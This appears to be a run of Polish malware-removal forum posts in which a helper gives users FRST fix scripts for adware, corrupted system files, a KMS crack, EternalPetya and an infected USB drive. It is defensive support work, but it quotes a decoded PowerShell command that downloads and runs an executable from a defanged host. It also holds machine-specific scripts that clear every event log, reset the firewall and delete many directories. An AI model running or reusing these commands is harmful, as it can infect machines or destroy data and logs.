picasso

Wszystko wykonane. Kończymy: 1. Przez SHIFT+DEL (omija Kosz) skasuj z dysku: C:\FRST C:\WINDOWS\ZAM_Guard.krnl.trace C:\WINDOWS\ZAM.krnl.trace ... oraz AdwCleaner, FRST i jego logi z katalogu Pobrane. 2. Wyczyść foldery Przywracania systemu: KLIK. Po wykonaniu w/w czynności nowy log nie wykazuje poprzednich błędów. Gdyby coś się jednak działo (dla porównania ten wątek) możesz odinstalować wymieniony program.

Problemem jest szkodliwy wpis startowy "explorer". Przy okazji, widać błędy i nadprodukcję plików Intel z błędami. Na razie przestawię tylko powiązane usługi na Ręczny i usunę pliki logów. Jeśli nie pomoże, odinstalujesz Intel® Driver Update Utility. Działania do przeprowadzenia: 1. Odinstaluj zbędny program HP Customer Participation Program 14.0. 2. W Firefox odinstaluj rozszerzenie Youtube Downloader - 4K Download, powiązane z dystrybucją adware. Szukaj go w sekcji "Przestarzałych rozszerzeń". W Chrome pozbądź się analogicznej produkcji tej samej marki Flash Video Downloader. 3. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-77619612-1921695928-275116232-1001\...\Run: [ROG] => explorer.exe hxxp://ozirizsoos.info Task: {6854DAAD-B69D-43DC-800E-814316C6A7E1} - System32\Tasks\ROG => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v ROG /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" Task: {FD384B4C-B997-43CA-93B1-41F6E64C9D34} - System32\Tasks\Driver Booster SkipUAC (ROG) => C:\Program Files (x86)\IObit\Driver Booster\4.1.0\DriverBooster.exe ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2016-12-20] (Zemana Ltd.) R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2016-12-20] (Zemana Ltd.) DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions C:\Users\ROG\AppData\Roaming\r.cmd C:\WINDOWS\ZAM.krnl.trace C:\WINDOWS\ZAM_Guard.krnl.trace C:\WINDOWS\system32\default_error_stack-*.txt C:\Windows\System32\drivers\zam64.sys C:\Windows\System32\drivers\zamguard64.sys Hosts: CMD: sc config ESRV_SVC_QUEENCREEK start= demand CMD: sc config SystemUsageReportSvc_QUEENCREEK start= demand CMD: sc config USER_ESRV_SVC_QUEENCREEK start= demand Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Są też inne drobne śmieci (puste wpisy, inne wpisy utworzone przez ComboFix, śmieci Asystenta kompatybilności, niepodpisane cyfrowo rozszerzenia FF, etc.) do usunięcia. Wykonaj fixlist.txt o następującej zawartości: U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 NAVENG; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160628.037\ENG64.SYS [X] S3 NAVEX15; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160628.037\EX64.SYS [X] MSCONFIG\Services: SDScannerService => 2 MSCONFIG\Services: SDUpdateService => 2 MSCONFIG\Services: SDWSCService => 2 MSCONFIG\Services: ServiceLayer => 3 Task: {1182B16F-B8D8-4140-A621-7C2FE8B6D2EF} - System32\Tasks\{1A9D120A-E5E8-409E-8C2C-CF76BB62E3DE} => C:\Users\Asus\Desktop\R120ODD1.EXE Task: {126A863A-55D3-476E-9767-461F6C6D30BC} - System32\Tasks\{4C839ED5-B831-4E68-BD7F-7944BB47B2F5} => C:\Windows\system32\pcalua.exe -a C:\Users\Asus\Desktop\jxpiinstall(1).exe -d C:\Users\Asus\Desktop Task: {336E5313-1A02-4520-BFA3-7CD289971A72} - System32\Tasks\{B62370DB-A6D2-488E-A8C0-24BE605C53E1} => C:\Windows\system32\pcalua.exe -a C:\Users\Asus\Desktop\rmclock_235_bin.exe -d C:\Users\Asus\Desktop Task: {42DD5195-B710-4211-8E40-F1F3A969690E} - System32\Tasks\{EEE6898E-0F12-4FCB-8BC3-D6E230FAC236} => C:\Users\Asus\Desktop\R410ODD1.EXE Task: {458BF3B1-0D09-489B-87BE-4895917CAFA7} - System32\Tasks\{A69C8ADD-7E09-4D8B-89D4-A3C343039A0A} => C:\Program Files (x86)\DVBT\AVCapture.exe Task: {6AE47AE8-CABC-4E6A-9EAA-9892048C8C66} - System32\Tasks\{9B3478AC-B743-4272-8C95-762194BF5685} => C:\Windows\system32\pcalua.exe -a C:\Users\Asus\Desktop\irfanview_plugins_430_setup.exe -d C:\Users\Asus\Desktop Task: {7017B731-C6F5-49C1-BDD7-E05784B8C8EA} - System32\Tasks\{85439239-48E0-4D56-BC32-3BAF080FAB54} => C:\Windows\system32\pcalua.exe -a E:\Software\RE-7500_Driver\Driver\FTDIUNIN.EXE -d E:\Software\RE-7500_Driver\Driver Task: {8137B42C-5678-4360-986F-B2D1B4FB11E2} - System32\Tasks\{48EA677F-2A64-42ED-A00C-CCA682AF1E16} => C:\Users\Asus\Desktop\R160VOL2.EXE Task: {87C01D68-5A71-408D-96D0-ACCD63DA5975} - System32\Tasks\{0A2F6E7C-E9C4-43B4-AB67-553EB4174CA4} => C:\Windows\system32\pcalua.exe -a C:\Users\Asus\Desktop\epson324599eu.exe -d C:\Users\Asus\Desktop Task: {8F8D67D1-79F2-4356-8CA0-3A5DACC79F53} - System32\Tasks\{E837B853-47C2-4F05-93A1-1D18FEAD69AF} => C:\Windows\system32\pcalua.exe -a C:\Users\Asus\Desktop\sp52461.exe -d C:\Users\Asus\Desktop Task: {B85373ED-EED4-4B01-B708-E07E32537E09} - System32\Tasks\{DA456E5D-2ADC-4A3A-9F16-8BA1E4C1A6BD} => C:\Users\Asus\Desktop\R160VOL2.EXE Task: {CE426B1F-7B8B-421F-B116-F5D730E93FB5} - System32\Tasks\{75EC2E16-9100-41CC-9137-12008542B49E} => C:\Windows\system32\pcalua.exe -a "C:\Users\Asus\Desktop\kamerka Liftec\Medion\SETUP.EXE" -d "C:\Users\Asus\Desktop\kamerka Liftec\Medion" Task: {EB6DBCB5-B2BA-4B8A-AFB7-D6186EDA6A0E} - System32\Tasks\{E12FBCCA-EDF5-4957-90E8-8E596C97EE54} => C:\Windows\system32\pcalua.exe -a C:\Users\Asus\Desktop\irfanview_lang_polski.exe -d C:\Users\Asus\Desktop Task: {D3E0D1BF-C810-4BBF-A28B-8115CC5FC60A} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\SymErr.exe Task: {EE5CF97D-EF44-4783-86A6-FBF7BD235A41} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\SymErr.exe Task: {F31402AF-0FE2-4238-90B7-DE1C4666ABA9} - System32\Tasks\{688B642D-622B-4E00-A14D-E9217759A7D3} => C:\Users\Asus\Desktop\EEPROM.exe Task: {FB4CF6EA-73D7-4AAC-B171-AED22AFE1827} - System32\Tasks\{AB74D821-6E27-4E84-BABD-D100B5761601} => C:\Users\Asus\Desktop\EEPROM.exe HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com SearchScopes: HKU\S-1-5-21-96536358-3161396084-2614321931-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.11.0.41\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.11.0.41\Exts\Chrome.crx FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Identity Safe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Spybot - Search & Destroy 2 RemoveDirectory: C:\ProgramData\Malwarebytes' Anti-Malware (portable) RemoveDirectory: C:\ProgramData\Spybot - Search & Destroy RemoveDirectory: C:\ProgramData\Temp RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Game Park RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RAR Password Cracker RemoveDirectory: C:\Qoobox RemoveDirectory: C:\Users\Asus\AppData\Roaming\AVAST Software RemoveDirectory: C:\Users\Asus\AppData\Roaming\TomTom RemoveDirectory: C:\Windows\System32\Tasks\Norton Identity Safe RemoveDirectory: C:\Windows\System32\Tasks\Safer-Networking StartBatch: del /q C:\ProgramData\mntemp del /q C:\Users\Asus\Downloads\antimalwaresetup.exe del /q C:\Windows\system32\Drivers\25C68225.sys netsh advfirewall reset EndBatch: Przedstaw wynikowy fixlog.txt. PS. I na przyszłość czego nie pobierać: Avenger (przestarzały), HijackThis (przestarzały, natywnie niezgodny z systemem 64-bit), Plumbytes (lewy program). Przy okazji, właściwości lecznicze ComboFix są na dzień dzisiejszy słabe, program nie ma specjalizacji w infekcjach adware/PUP i coraz mniej osób go używa w procedurach dezynfekcji (a ja ostatni raz zaleciłam go ... kilka lat temu). Pokasuj z Pobranych ostatnie narzędzia.

Tu nie ma uszkodzenia. Mamy do czynienia z następującym systemem: Platform: Windows 7 Home Premium Service Pack 1 (X64) Język: Polski (Polska) Na edycjach Home usługa AppMgmt nie występuje. Dzięki temu wpisowi w logach od razu można się zorientować jakie narzędzie używano. To skutek użycia ComboFix, który błędnie "przywraca" wpis tej usługi w rejestrze na edycjach na których jej nie ma być. To niepoprawny i niedziałający element, który należy całkowicie usunąć, a nie "naprawiać". PS. Odczyt "Brak ServiceDLL" odnosi się do rejestru, a nie do obecności pliku na dysku. SFC w ogóle nie zajmuje się reperacjami rejestru, więc nawet gdyby to było rzeczywiste uszkodzenie, poza skalą SFC.

Wyciąg z Szukaj plików wykazuje masową dewastację komponentów, wyróżniam dwie nieprawidłowe grupy: ----> Wszystkie odczyty z sumą kontrolną D41D8CD98F00B204E9800998ECF8427E (suma ciągu pustego) oraz bez opisu "Microsoft" to pliki definitywnie uszkodzone: ----> Pozostałe wyniki pozornie wyglądające "OK" poprzez opis "Microsoft" też wyglądają podejrzanie, różne wersje komponentów mają wspólną sumę kontrolną, tak jakby kopiowano "na oko" ten sam plik w różne miejsca. Powiązane sumy kontrolne nie wyglądają na prawidłowe. Na szybko przykład: Zdewastowane komponenty nie posiadają poprawnej kopii alternatywnej w WinSxS, a kopie spoza tego systemu na dysku X: RE oraz cache ComboFix są za stare i niekompletne (te z dysku X: są tylko 64-bitowe, podczas gdy mamy też naruszenia 32-bitowe), więc pliki musiałyby być kopiowane z innego systemu posiadającego identyczne wersje komponentów. I może nie pomóc podstawienie tylko głównych wersji plików w system32/SysWOW64 (KnowDLLs jest bardzo "czułe" i pamiętam przypadek BSOD z forum wymagający uzgodnienia wszystkich kopii), a uzupełnienie wszystkich wersji komponentów w WinSxS to pracochłonna robota, nie można "na oko" powielać tego samego pliku, każdy komponent ma inną sumę kontrolną MD5. Poza tym, wyniki wyszukiwania nie wróżą za dobrze, podobna sytuacja może być w obszarze innych komponentów których log FRST po prostu nie wykaże, a danych nie można potwierdzić (SFC nie nagrywa raportu w trybie "offline"). Jest zbyt dużo jawnych uszkodzeń oraz podejrzenie wielu innych uszkodzeń. Poddaję w wątpliwość próby szczegółowej reperacji systemu reanimowanego z padniętego dysku. Sugeruję raczej wykonanie tzw. nakładkowej reperacji, która daje większą gwarancję "przebicia" większej ilości uszkodzonych plików:

W raporcie FRST rzuca się w oczy następująca informacja: ==================== Known DLLs (filtrowane) ========================= C:\Windows\System32\kernel32.dll BRAK <==== UWAGA [2016-12-22 01:20] - [2016-10-11 16:31] - 001068544 _____ () C:\Windows\System32\MSCTF.dll [2017-04-04 14:05] - [2017-04-04 14:05] - 000000000 _____ () C:\Windows\SysWOW64\rpcrt4.dll Jeden z kluczowych plików nieobecny, dwa pozostałe uszkodzone (brak etykiety Microsoftu). Log z FRST jest mocno ograniczony tylko do elementów stricte startowych, więc to prawdopodobnie nie są wszystkie uszkodzenia. Na jednym z zrzutów ekranów jest też informacja o uszkodzeniu cng.sys, choć nie mam pewności czy coś już nie zostało tu naprawione (może sfc /scannow z "off"), bo w logu figuruje jako świeżo utworzony: 2017-11-11 15:37 - 2016-11-20 15:07 - 000467392 _____ (Microsoft Corporation) C:\Windows\System32\Drivers\cng.sys Na razie: Uruchom FRST ponownie, w polu Szukaj wpisz 4 nazwy plików rozdzielone średnikami (bez spacji pomiędzy): kernel32.dll;MSCTF.dll;rpcrt4.dll;cng.sys Klik w Szukaj plików i dostarcz log Search.txt utworzony tam skąd uruchamiasz FRST.

Opis sugeruje, że może być wymagana reinstalacja całego systemu. Podaj dokładne szczegóły / kody błędu pokazujące się na ekranie naprawczym. Na wszelki wypadek dodaj też raport z FRST zrobiony z poziomu środowiska zewnętrznego: Polecenie podstawowe sfc /scannow adresuje bieżący system, czyli to wyniki z innego systemu niż ze zdefektowanego dysku i są tu zupełnie nieprzydatne. Natomiast polecenie z przełącznikami "off" nie nagrywa danych do CBS.log, tylko na Windows 7 komunikat nie podaje tej informacji, na nowszych platformach dodano do komunikatu treść: "Details are included in the CBS.Log windir\Logs\CBS\CBS.log. For example C:\Windows\Logs\CBS\CBS.log. Note that logging is currently not supported in offline servicing scenarios." Czyli brak danych i nie ma jak tu ruszyć.

Infomacyjnie:

Adres 93.184.220.29 jest ponoć związany z certyfikatami: link, link.

Ta karta nie wykazuje śladów infekcji.

Wersja 1709 wydana co dopiero i wdrażanie via Windows Update jest robione partiami, tzn. na razie nie wszyscy użytkownicy mają tę ofertę na Windows Update, dlatego u Ciebie najwyższa wykryta edycja to 1703. Tak się dzieje chyba przy każdej edycji w czasie bardzo bliskim jej wydania. Komunikat o dostępności starszej aktualizacji zniknie, jeśli zaktualizujesz system przy udziale Asystenta aktualizacji. Aktualizacja edycji zeruje cały folder Windows.

+ Na dysku jest definitywnie więcej niż jeden profil (Default + Profile Numer). Widać też że co dopiero robiłeś próbę tworzenia kolejnego profilu (Profile 1 zmieniło się w Profile 2), ale ta operacja nie zmieniła stanu rzeczy i nadal jest więcej niż jeden folder profilu. Skoro w opcjach widzisz tylko jedną Osobę, to oznacza że poprzedni profil jest martwy i należy ręcznie usunąć katalog martwego profilu. To załączę w skrypcie poniżej. Operacje zadane w punkcie 2 tyczyły tylko bieżącego profilu (są nieaktualne po utworzeniu nowego, co właśnie uczyniłeś), nie wpływają w ogóle na ilość profilów / ich folderów na dysku. Już usunąłeś to narzędzie z dysku, ale w Twoim pierwszym logu był widoczny: 2017-10-16 13:01 - 2017-10-16 13:01 - 000448512 _____ (OldTimer Tools) C:\Users\Rafał\Downloads\TFC.exe Archiwalny opis programu na forum: KLIK. Jak mówiłam, ten program nie powinien być stosowany na nowszych systemach niż Windows 7. 1. Usunięcie pustych wpisów / odpadków. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: StartRegedit: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] @="Bing" "DisplayName"="@ieframe.dll,-12512" "URL"="http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] @="Bing" "DisplayName"="@ieframe.dll,-12512" "URL"="http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" EndRegedit: CustomCLSID: HKU\S-1-5-21-886091981-26357939-1909133584-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Rafał\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-886091981-26357939-1909133584-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Rafał\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-886091981-26357939-1909133584-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Rafał\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll => Brak pliku Task: {1CF04B0B-D27D-4CAD-892A-D77B2C69EF0C} - System32\Tasks\SafeZone scheduled Autoupdate 1479649039 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe Task: {703DB337-CF41-453C-A2EB-01BF44B10AA6} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software) Task: {79C06A0F-BDAC-4397-BD62-46C870285ECB} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM-x32\...\RunOnce: [!CD] => C:\Windows\temp\dragon_setup.exe [70057568 2017-10-17] (Comodo) <==== UWAGA HKLM\...\StartupApproved\Run: => "Malwarebytes TrayApp" HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartupApproved\Run: => "RESTART_STICKY_NOTES" HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartupApproved\Run: => "BitTorrent" DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Common Files\AV\avast! Antivirus RemoveDirectory: C:\Program Files (x86)\metadata RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\Program Files (x86)\NCH Software RemoveDirectory: C:\Program Files (x86)\reports RemoveDirectory: C:\ProgramData\{6E35203C-6E98-4378-8362-112CFE55C2C1} RemoveDirectory: C:\ProgramData\adaware RemoveDirectory: C:\ProgramData\AVAST Software RemoveDirectory: C:\ProgramData\Avg RemoveDirectory: C:\ProgramData\Avira RemoveDirectory: C:\ProgramData\dbg RemoveDirectory: C:\ProgramData\IObit RemoveDirectory: C:\ProgramData\Kaspersky Lab Setup Files RemoveDirectory: C:\ProgramData\Lavasoft RemoveDirectory: C:\ProgramData\McAfee RemoveDirectory: C:\ProgramData\NCH Software RemoveDirectory: C:\ProgramData\Temp RemoveDirectory: C:\ProgramData\UniqueId RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV Rights of Man RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FireFly Studios RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SEGA RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stronghold Crusader 2 RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total War ROME II Emperor Edition RemoveDirectory: C:\Users\Rafał\AppData\Local\AdAwareDesktop RemoveDirectory: C:\Users\Rafał\AppData\Local\AdAwareUpdater RemoveDirectory: C:\Users\Rafał\AppData\Local\drmingw RemoveDirectory: C:\Users\Rafał\AppData\Local\Firefox RemoveDirectory: C:\Users\Rafał\AppData\Local\GG RemoveDirectory: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\Default RemoveDirectory: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\System Profile RemoveDirectory: C:\Users\Rafał\AppData\LocalLow\Mozilla RemoveDirectory: C:\Users\Rafał\AppData\Roaming\Avira RemoveDirectory: C:\Users\Rafał\AppData\Roaming\GG RemoveDirectory: C:\Users\Rafał\AppData\Roaming\icfib RemoveDirectory: C:\Users\Rafał\AppData\Roaming\NCH Software RemoveDirectory: C:\Users\Rafał\AppData\Roaming\New Version Available RemoveDirectory: C:\Users\Rafał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Delete Doctor RemoveDirectory: C:\Windows\AutoKMS RemoveDirectory: C:\Windows\System32\Tasks\AVAST Software Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Nowe skany FRST nie są na razie potrzebne. 2. Jest tu też aspekt cracka KMS: S2 KMSEmulator; C:\ProgramData\KMSAuto\bin\KMSSS.exe [301056 2015-07-24] (MDL Forum, mod by Ratiborus) [Brak podpisu cyfrowego] R2 KMSServerService; C:\Windows\KMSServerService\KMS Server Service.exe [236032 2017-10-16] (My Digital Life Forums) [Brak podpisu cyfrowego] R3 ptun0901; C:\Windows\system32\DRIVERS\ptun0901.sys [27136 2014-08-08] (The OpenVPN Project) 2017-10-15 22:36 - 2017-10-16 22:36 - 000000000 ____D C:\Windows\AutoKMS 2017-10-15 22:36 - 2017-10-15 22:36 - 000003758 _____ C:\Windows\System32\Tasks\AutoKMS 2017-10-15 22:35 - 2017-10-15 22:36 - 000000000 ____D C:\ProgramData\Microsoft Toolkit 2017-10-15 22:32 - 2017-10-15 22:32 - 000000000 ____D C:\ProgramData\KMSAuto 2017-10-15 22:18 - 2014-08-08 18:31 - 000027136 _____ (The OpenVPN Project) C:\Windows\system32\Drivers\ptun0901.sys 2017-10-15 22:18 - 2014-05-25 02:36 - 000015360 _____ C:\Windows\system32\SppExtComObjHook.dll 2017-10-15 22:18 - 2014-05-25 02:36 - 000004608 _____ C:\Windows\system32\SppExtComObjPatcher.exe 2017-10-15 22:17 - 2017-10-15 22:38 - 000000000 ____D C:\Users\Rafał\AppData\Local\MSfree Inc 2017-10-15 22:16 - 2017-10-15 22:16 - 000000000 __RHD C:\Windows\KMS Crack został już częściowo uszkodzony (prawdopodobnie przez AdwCleaner), gdyż w Harmonogramie figurowało uszkodzone zadanie AutoKMS kierujące donikąd. To zadanie załączone powyżej w skrypcie naprawy, ale resztę cracka to należy odwrócić deinstalatorem cracka. 3. Jeśli chodzi o komunikat o naruszeniu WMI, który nadal figuruje, to nadal nie jest wykluczony wpływ COMODO. Niemniej na wszelki wypadek poproszę o raport diagnostyczny z WMI Diagnosis Utility. Skrypt należy uruchomić jako Administrator, czyli po rozpakowaniu narzędzia do jakiegoś folderu w krótkiej ścieżce dostępu i bez spacji: klawisz z flagą Windows + X > Wiersz polecenia (Administrator) > wklep ścieżkę do pliku WMIDiag.vbs i ENTER. Wynikowemu raportowi zmień ręcznie rozszerzenie z *.log na *.txt, by wszedł w załączniki.

Skorzystaj z Asystenta aktualizacji, który jest zawsze linkowany na stronie głównej pobierania Windows 10. Asystent instaluje najnowszą dostępną linię. PS. Instalacje z Windows Update też powinny podstawić najnowszą dostępną wersję (z pominięciem pośrednich). Np. ostatnio z Windows Update aktualizowałam wersję początkową RTM od razu do Wersji 1703.

Fix poprzedników adresował mniej niż Miszela i temat infekcji to wcale nie został rozwiązany do końca (pominęli np. blokady w pliku Hosts wprowadzone przez infekcję certyfikatów). Miszel pociągnie ten temat, ja skomentuję tylko niektóre wątki: W kwestii WMI, ten ostatni log wykazuje także całą masę innych dziwnych "uszkodzeń" (ogromna ilość usług / sterowników w stanie "U" + "Brak podpisu cyfrowego"). Te wszystkie objawy mogą być skutkiem uruchomienia FRST w niepoprawny sposób, tzn. poprzez piaskownicę Comodo. FRST uruchomiony w taki sposób ma charakterystyczną zieloną obwódkę naokoło okna, nie ma dostępu do danych i wynikowe logi pokazują dużo dziwnych rzeczy. Tak więc zrób nowy zestaw raportów z FRST, upewniając się że FRST nie jest uruchomiony wsposób wirtualny i Comodo go nie blokuje. Po pierwsze, jest tu układ z więcej niż jednym profilem, który może to wyjaśniać: Chrome: ======= CHR DefaultProfile: Profile 1 (...) CHR Profile: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\Default [2017-10-16] (...) CHR Profile: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\Profile 1 [2017-10-17] (...) Po drugie, są w pewnych miejscach skróty do fałszywego Chrome: Shortcut: C:\Users\Rafał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Standoor\Application\chrome.exe (Brak pliku) Zwykle w takich przypadkach usuwa się nieużywane profile w konfiguracji Osoby, następnie wszystkie skróty Chrome, a po tym ręcznie tworzy nowe. I jeszcze uwaga na koniec: był używany TFC Cleaner (TFC.exe). To narzędzie kończy kompatybilność na Windows 7, nie jest bezpieczne jego używanie na nowszych systemach (zagrożenie uszkodzeniami).

Fiks pomyślnie wykonany. Czy są jeszcze jakieś problemy w systemie lub na urządzeniach?

Wg obrazka to nie oryginalna Petya tylko piracki wariant EternalPetya. Jak powiedziane w artykule, ten wariant jest prawdopodobnie celowo "uszkodzony" i odkodowanie awykonalne, nawet przez autorów malware (!): W tym przypadku nie pomoże więc nawet uiszczenie opłaty.

Plik w postaci załącznika został usunięty, gdyż nie wolno na serwer tutaj ładować zainfekowanych plików, niezależnie od tego czy plik stanowiłby zagrożenie dla innych (zmieniona nazwa rozszerzenia). Cytowana zawartość pliku bez wątpienia wskazuje, że to szkodnik, ale szkodnik dla platformy Windows wykorzystujący wbudowany w system PowerShell. Komenda wdrażana przy udziale PowerShell po odkodowaniu: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('hxxp://mwojciechowicz.nstrefa.pl/zdr/s50.exe', $env:APPDATA\nvid.exe );Start-Process ( $env:APPDATA\nvid.exe ) [Czyli jest pobierany z serwera plik s50.exe, który zostaje wstawiony na Windows w ścieżce %AppData%\nvid.exe] Jeśli załącznik był pobrany tylko na tablet z Androidem, tu kończy się pomoc, gdyż ani nie ma narzędzi diagnostycznych na Androida które stosujemy tutaj, ani cytowana zawartość nie wskazuje by platforma Android była w zakresie działania infekcji. Jeśli jednak załącznik miał styczność z platformą Windows, wymagane są raporty obowiązkowe działu.

Wg skanu USBFix jest wykryte nowe urządzenie (o czym świadczy inna zawartość z muzyką). Ta sama litera F:, gdyż odpiąłeś poprzedni dysk i została ona zwolniona do ponownego mapowania. Urządzenie wg spodziewań również wykazuje ślady infekcji (2 ukryte foldery oraz szkodliwe pliki). Kolejna porcja działań: Oczywiście urządzenie musi być podpięte i widoczne pod literą F:. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: StartBatch: attrib /d /s -r -s -h F:\* del /q F:\*.scr del /q F:\Autorun.inf del /q F:\Thumbs* reg load HKLM\Temp C:\FRST\Hives\SOFTWARE reg export "HKLM\Temp\Microsoft\Windows NT\CurrentVersion\Winlogon" C:\Users\KAZI\Desktop\eksport.reg reg unload HKLM\Temp EndBatch: DeleteQuarantine: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Naprawa powinna wykonać się szybko i bez restartu. Powstanie kolejny plik fixlog.txt w folderze z którego uruchamiasz FRST - pokaż go. Dodatkowo, na Pulpicie powstanie plik eksport.reg. Shostuj ten plik na jakimś serwisie zewnętrznym i podaj link do pliku.

Naprawa pomyślnie wykonana, infekcja wygląda na usuniętą z dysków C i F. Owszem, infekcji mogła ulec także karta. Podłącz urządzenie do komputera i zrób nowy log USBFix z opcji Listing.

